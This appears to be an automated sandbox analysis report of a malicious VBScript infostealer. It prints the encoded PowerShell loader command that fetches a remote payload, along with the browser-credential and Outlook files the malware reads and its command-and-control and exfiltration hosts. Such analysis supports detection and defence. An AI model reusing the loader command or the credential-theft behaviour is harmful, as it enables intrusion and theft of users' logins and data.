acqaywbvag4azgblagmadabpag8abgblahiacwagacsapqagacqababhahuabgbkaguacgblahialgbmaguabgbnahqaaaa7acqacwboaguazqbyagwazqbzahmaiaa9acaajabmahiayqbjahqaaqbvag4ayqb0agkabgbnacaalqagacqaywbvag4azgblagmadabpag8abgblahiacwa7acqazwbuageacgbsagkazqbzahqaiaa9acaajaboahkazqb0ag8abqblahqacgbvagcacgbhahaaaaauafmadqbiahmadabyagkabgbnacgajabjag8abgbmaguaywb0agkabwbuaguacgbzacwaiaakahmaaablaguacgbsaguacwbzackaowakahaaaqbsahaadqbsagkacwb0agkaywagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabnag4ayqbyagwaaqblahmadaapadsajabsag8aywb1ahmadabpagqaiaa9acaawwbtahkacwb0aguabqauafiazqbmagwazqbjahqaaqbvag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoacqacabpagwacab1agwaaqbzahqaaqbjackaowakafyazqbsahuadwbzacaapqagafsazabuagwaaqbiac4asqbpac4asabvag0azqbdac4arwblahqatqblahqaaabvagqakaanafyaqqbjaccakqauaekabgb2ag8aawblacgajabuahuababsacwaiabbag8aygbqaguaywb0afsaxqbdacaaqaaoacqacablag4adabhagqaaqbjacwajwanacwajwanacwajwanacwajwbnafmaqgb1agkababkaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccakqapaa
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -noprofile -command "[system.text.encoding]::unicode.getstring([convert]::frombase64string('jabhagqaagbvahuacgbuag0azqbuahqaiaa9acaajwawac8abqbtafkawabsahkawabrac8azaavaguazqauaguadabzageacaavac8aogbzahaadab0aggajwa7acqacablag4adabhagqaaqbjacaapqagacqayqbkagoabwb1ahiabgbtaguabgb0acaalqbyaguacabsageaywblacaajwajaccalaagaccadaanadsajabmageacgbhagqaaqb6aguaiaa9acaajwboahqadabwahmaogavac8amwawadaanqauagyaaqbsaguabqbhagkabaauagmabwbtac8ayqbwagkalwbmagkabablac8azwblahqapwbmagkabablagsazqb5ad0abgbjahgaxwa1afqamabmahgasabpaeiaagbpagwatgbiadkaqwbsahyaaqbhagiauabqahiavwayagqababdac0atab4aguatwbkaeoauabgaf8awgbfadeatqbqadyaqwb1afeaqgbtaduaswbjahaadabbacyacabraf8adgbpagqapqazadqamga4adaamwbkadeaywbjadqazqazagiaoaawadeanwazadkamwa1adkamgawadmayga1agyazqa5agqajwa7acqazqbvagwaaqbhag4aiaa9acaatgblahcalqbpagiaagblagmadaagafmaeqbzahqazqbtac4atgblahqalgbxaguaygbdagwaaqblag4adaa7acqaywbhahiabwb0agkaywagad0aiaakaguabwbsagkayqbuac4arabvahcabgbsag8ayqbkaeqayqb0ageakaakagyayqbyageazabpahoazqapadsajaboahkazqb0ag8abqblahqacgbvagcacgbhahaaaaagad0aiabbafmaeqbzahqazqbtac4avablahgadaauaeuabgbjag8azabpag4azwbdadoaogbvafqarga4ac4arwblahqauwb0ahiaaqbuagcakaakagmayqbyag8adabpagmakqa7acqababhahuabgbkaguacgblahiaiaa9acaajwa8adwaqgbbafmarqa2adqaxwbtafqaqqbsafqapga+accaowakahmazqbtagkacaboahkababsagkazabpageabgagad0aiaanadwapabcaeeauwbfadyanabfaeuatgbead4apganadsajabjag8abgbmaguaywb0agkabwbuaguacgbzacaapqagacqaaab5aguadabvag0azqb0ahiabwbnahiayqbwaggalgbjag4azablahgatwbmacgajabsageadqbuagqazqbyaguacgapadsajabmahiayqbjahqaaqbvag4ayqb0agkabgbnacaapqagacqaaab5aguadabvag0azqb0ahiabwbnahiayqbwaggalgbjag4azablahgatwbmacgajabzaguabqbpahaaaab5agwababpagqaaqbhag4akqa7acqaywbvag4azgblagmadabpag8abgblahiacwagac0azwblacaamaagac0ayqbuagqaiaakagyacgbhagmadabpag8abgbhahqaaqbuagcaiaatagcadaagacqaywbvag4azgblagmadabpag8abgblahiacwa7
acqaywbvag4azgblagmadabpag8abgblahiacwagacsapqagacqababhahuabgbkaguacgblahialgbmaguabgbnahqaaaa7acqacwboaguazqbyagwazqbzahmaiaa9acaajabmahiayqbjahqaaqbvag4ayqb0agkabgbnacaalqagacqaywbvag4azgblagmadabpag8abgblahiacwa7acqazwbuageacgbsagkazqbzahqaiaa9acaajaboahkazqb0ag8abqblahqacgbvagcacgbhahaaaaauafmadqbiahmadabyagkabgbnacgajabjag8abgbmaguaywb0agkabwbuaguacgbzacwaiaakahmaaablaguacgbsaguacwbzackaowakahaaaqbsahaadqbsagkacwb0agkaywagad0aiabbafmaeqbzahqazqbtac4aqwbvag4adgblahiadabdadoaogbgahiabwbtaeiayqbzaguanga0afmadabyagkabgbnacgajabnag4ayqbyagwaaqblahmadaapadsajabsag8aywb1ahmadabpagqaiaa9acaawwbtahkacwb0aguabqauafiazqbmagwazqbjahqaaqbvag4algbbahmacwblag0aygbsahkaxqa6adoatabvageazaaoacqacabpagwacab1agwaaqbzahqaaqbjackaowakafyazqbsahuadwbzacaapqagafsazabuagwaaqbiac4asqbpac4asabvag0azqbdac4arwblahqatqblahqaaabvagqakaanafyaqqbjaccakqauaekabgb2ag8aawblacgajabuahuababsacwaiabbag8aygbqaguaywb0afsaxqbdacaaqaaoacqacablag4adabhagqaaqbjacwajwanacwajwanacwajwanacwajwbnafmaqgb1agkababkaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccalaanaccakqapaaJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

                  Source: Yara matchFile source: 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7424, type: MEMORYSTR
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7424, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Top Sites
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; File opened: C:\Users\user\AppData\Roaming\PostboxApp\Profiles\
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: Yara match; File source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: MSBuild.exe PID: 7424, type: MEMORYSTR

                  Remote Access Functionality

                  Source: Yara match; File source: 0000000B.00000002.2554364228.00000000031E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: MSBuild.exe PID: 7424, type: MEMORYSTR
                  Source: Yara match; File source: 2.2.powershell.exe.1f5dc50d150.7.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 11.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 2.2.powershell.exe.1f5dc50d150.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 2.2.powershell.exe.1f5dc30e518.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara match; File source: 0000000B.00000002.2548400148.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000002.00000002.1400796232.000001F5DADB1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: 00000002.00000002.1400796232.000001F5DBD5A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara match; File source: Process Memory Space: powershell.exe PID: 6140, type: MEMORYSTR
                  Source: Yara match; File source: Process Memory Space: MSBuild.exe PID: 7424, type: MEMORYSTR

                  MITRE ATT&CK Matrix (one row per line, 14 tactic columns; the digits before a technique name are the hit badges shown in that cell)

                  Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                  Gather Victim Identity Information | 321 Scripting | Valid Accounts | 1 Exploitation for Client Execution | 321 Scripting | 1 DLL Side-Loading | 1 Disable or Modify Tools | 1 OS Credential Dumping | 1 File and Directory Discovery | Remote Services | 11 Archive Collected Data | 2 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                  Credentials | Domains | Default Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 211 Process Injection | 1 Deobfuscate/Decode Files or Information | LSASS Memory | 13 System Information Discovery | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
                  Email Addresses | DNS Server | Domain Accounts | 2 PowerShell | Logon Script (Windows) | Logon Script (Windows) | 3 Obfuscated Files or Information | Security Account Manager | 1 Security Software Discovery | SMB/Windows Admin Shares | 1 Email Collection | 11 Encrypted Channel | Automated Exfiltration | Data Encrypted for Impact
                  Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 1 DLL Side-Loading | NTDS | 1 Process Discovery | Distributed Component Object Model | Input Capture | 1 Non-Standard Port | Traffic Duplication | Data Destruction
                  Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Masquerading | LSA Secrets | 31 Virtualization/Sandbox Evasion | SSH | Keylogging | 3 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                  Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 31 Virtualization/Sandbox Evasion | Cached Domain Credentials | 1 Application Window Discovery | VNC | GUI Input Capture | 24 Application Layer Protocol | Data Transfer Size Limits | Service Stop
                  DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 211 Process Injection | DCSync | 1 System Network Configuration Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  Behavior Graph ID: 1617738; Sample: jjmax il.vbs; Start date: 18/02/2025; Architecture: WINDOWS; Score: 100

                  Start
                    DNS/IP: reallyfreegeoip.org (Tries to detect the country of the analysis system (by using the IP)); paste.ee (Connects to a pastebin service (likely for C&C)); 11 other IPs or domains
                    Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 15 other signatures
                    started wscript.exe (2)
                      Signatures: VBScript performs obfuscated calls to suspicious functions; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 2 other signatures
                      started powershell.exe (14 15)
                        DNS/IP: ip.3005.filemail.com 193.30.119.105, 443, 49699 DFNVereinzurFoerderungeinesDeutschenForschungsnetzese unknown; paste.ee 23.186.113.60, 443, 49700 KLAYER-GLOBALNL Reserved
                        Signatures: Writes to foreign memory regions; Injects a PE file into a foreign processes
                        started MSBuild.exe (15 2)
                          DNS/IP: turkey.ipchina163.com 111.90.142.170, 49844, 587 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia; checkip.dyndns.com 132.226.8.169, 49707, 49725, 49737 UTMEMUS United States; 2 other IPs or domains
                          Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc)
                        started conhost.exe
                        started MSBuild.exe
